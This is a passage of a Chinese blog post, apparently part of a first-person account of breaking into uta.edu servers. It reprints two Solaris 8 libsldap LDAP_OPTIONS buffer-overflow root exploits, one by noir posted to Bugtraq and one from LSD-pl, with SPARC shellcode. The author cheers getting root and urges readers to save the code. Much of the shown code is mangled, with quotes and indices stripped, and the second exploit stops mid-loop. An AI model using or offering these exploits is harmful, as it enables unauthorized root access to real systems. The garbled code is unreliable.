一次利用show files类cgi漏洞成功入侵uta.edu的经历

下面是关于sunos5.8的本地溢出

 首先solaris的gcc 一般在/usr/local/bin/gcc 所以可以在gcc上编译， 代码 在安焦有

==================================================== From: Noir Desir To: bugtraq@securityfocus.com Subject: Solaris 8 libsldap exploit Date: 2001-7-5 14:14:00 ==================================================== Hi, I wish to free this one since it has been made public by some ppl. libsldap hole has been known for long. As far as I know, sway@hack.co.za did actually found the hole several months ago and generously let me know about it. All propz goes to him. Thanks bro. Exploit is plain simple, tested on an Ultra10 and an Enterprise 3500 with success. I usually support the anti-sec movement but I got my reasons to publish the exploit. If you want to know why, please do mail me. $ ./libsldap-exp libsldap.so.1 $LDAP _ OPTIONS enviroment variable buffer overflow Exploit code: noir@gsu. linux .org.tr Bug discovery: sway@hack.co.za Usage: ./libsldap-exp target# target#: 0, /usr/bin/passwd Solaris8, Sparc64 target#: 1, /usr/bin/nispasswd Solaris8, Sparc64 target#: 2, /usr/bin/yppasswd Solaris8, Sparc64 target#: 3, /usr/bin/chkey Solaris8, Sparc64 target#: 4, /usr/lib/sendmail Solaris8, Sparc64 $ ./libsldap-exp 0 # id uid=0(root) gid=0(root) # PS: t(L)amer sahin kicina oyle bir tekme yiyeceksinki, agzindan cikicak. Haberin olsun istedim : ) Greetings: sway, anathema, gov-boi, www.hack.co.za, ertan _ kurt, cronos cheers, noir /** !!!PRIVATE!!! ** noir@gsu. linux .org.tr ** libsldap.so.1 $LDAP _ OPTIONS enviroment variable overflow exploit; ** **/ #include #define ADJUST 1 /* anathema@hack.co.za ** Solaris/SPARC shellcode ** setreuid(0, 0); setregid(0, 0); execve(/bin/sh, args, 0); */ char shellcode[] = \x90\x1a\x40\x09\x92\x1a\x40\x09\x82\x10\x20\xca\x91\xd0\x20\x08 \x90\x1a\x40\x09\x92\x1a\x40\x09\x82\x10\x20\xcb\x91\xd0\x20\x08 \x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e \x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0 \xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08; struct type { char *string; char *path; long retaddr; }; struct type target[] = { { 0, /usr/bin/passwd Solaris8, Sparc64, /usr/bin/passwd, 0xffbefe98 }, { 1, /usr/bin/nispasswd Solaris8, Sparc64, /usr/bin/nispasswd, 0xffbefe98 }, { 2, /usr/bin/yppasswd Solaris8, Sparc64, /usr/bin/yppasswd, 0xffbefe98 }, { 3, /usr/bin/chkey Solaris8, Sparc64 , /usr/bin/chkey, 0xffbefea8 }, { 4, /usr/lib/sendmail Solaris8, Sparc64, /usr/lib/sendmail, 0xffbefeb8 }, { NULL, NULL, 0 } }; int i; unsigned long ret _ adr; char ldap[4000]; char egg[400]; char *envs[] = { ldap, egg, NULL }; main(int argc, char *argv[]) { if(!argv[1]) { fprintf(stderr, libsldap.so.1 $LDAP _ OPTIONS enviroment variable \ buffer overflow\nExploit code: noir@gsu. linux .org.tr\nBug discovery: sway@hack.co.za\n\nUsage: %s target#\n\n, argv[0]); for(i = 0; target.string != NULL; i++) fprintf(stderr,target#: %s\n, target.string); exit(0); } ret _ adr = target[atoi(argv[1])].retaddr; memset(egg, 0x00, sizeof egg); for(i = 0 ; i < 400 - strlen(shellcode) ; i +=4) *(long *)&egg = 0xa61cc013; for (i= 0 ; i < strlen(shellcode); i++) egg[200+i]=shellcode; for ( i = 0; i < ADJUST; i++) ldap=0x58; for (i = ADJUST; i < 4000; i+=4) { ldap[i+3]=ret _ adr & 0xff; ldap[i+2]=(ret _ 8 ) &0xff; ldap[i+1]=(ret _ 16 ) &0xff; ldap[i+0]=(ret _ 24 ) &0xff; } memcpy(ldap, LDAP _ OPTIONS=, 13); ldap[strlen(ldap) - 3] = 0x00; //ldap[3998] has to be NULL terminated execle(target[atoi(argv[1])].path, 12341234, (char *)0, envs); }
编译后执行就是root了 ：）

补充一点,gcc一般sunos5.8都装了,5.7则不一定 @ _ @ 这个 代码 是noir写的,倒~~~noir不是一个 动画 不过这个noir倒是我的偶像哦~~~ 编译后运行,倒!~~~失败,原因不明,估计也是那个该死的root做了些很bt的西西.倒~~~ 我这次真的火了
$uname -a SunOS sun250 5.8 Generic _ 108528-02 sun4u sparc SUNW,Ultra-250 KAO
就是这个鸟版本,faint 我一气之下就去hack.co.za的镜像又拖了个exploit,呵呵,是lsd-pl写的,他们都东西我很喜欢,崇拜~~!!!!!!偶像!!!~~~!!!!@ _ @ 这个代码是hack.co.za上2001年7月才发布的,想必很多人都没有,赶快收好吧!!

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ /*## copyright LAST STAGE OF DELIRIUM jun 2001 poland *://lsd-pl.net/ #*/ /*## libsldap.so.1 #*/ #define NOPNUM 16000 #define ADRNUM 512 char setuidcode[]= \x90\x08\x3f\xff /* and %g0,-1,%o0 */ \x82\x10\x20\x17 /* mov 0x17,%g1 */ \x91\xd0\x20\x08 /* ta 8 */ ; char shellcode[]= \x20\xbf\xff\xff /* bn,a */ \x20\xbf\xff\xff /* bn,a */ \x7f\xff\xff\xff /* call */ \x90\x03\xe0\x20 /* add %o7,32,%o0 */ \x92\x02\x20\x10 /* add %o0,16,%o1 */ \xc0\x22\x20\x08 /* st %g0,[%o0+8] */ \xd0\x22\x20\x10 /* st %o0,[%o0+16] */ \xc0\x22\x20\x14 /* st %g0,[%o0+20] */ \x82\x10\x20\x0b /* mov 0xb,%g1 */ \x91\xd0\x20\x08 /* ta 8 */ /bin/ksh ; char jump[]= \x81\xc3\xe0\x08 /* jmp %o7+8 */ \x90\x10\x00\x0e /* mov %sp,%o0 */ ; static char nop[]=\x80\x1c\x40\x11; main(int argc,char **argv){ char buffer[30000],adr[4],*b,*envp[3]; int i,n=-1; printf(copyright LAST STAGE OF DELIRIUM jun 2001 poland //lsd-pl.net/\n); printf(libsldap.so.1 solaris 2.8 sparc\n\n); if(argc==1){ printf(usage: %s {passwd|chkey|sendmail}\n,argv[0]);exit(-1); } if(!strcmp(argv[1],passwd)) n=0; if(!strcmp(argv[1],chkey)) n=1; if(!strcmp(argv[1],sendmail)) n=2; if(n==-1) exit(-1); *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+14900+8000; envp[0]=&buffer[0]; envp[1]=&buffer[1000]; envp[2]=0; b=&buffer[0]; sprintf(b,LDAP _ OPTIONS=); b+=13; for(i=0;i

上一页  [1] [2] [3]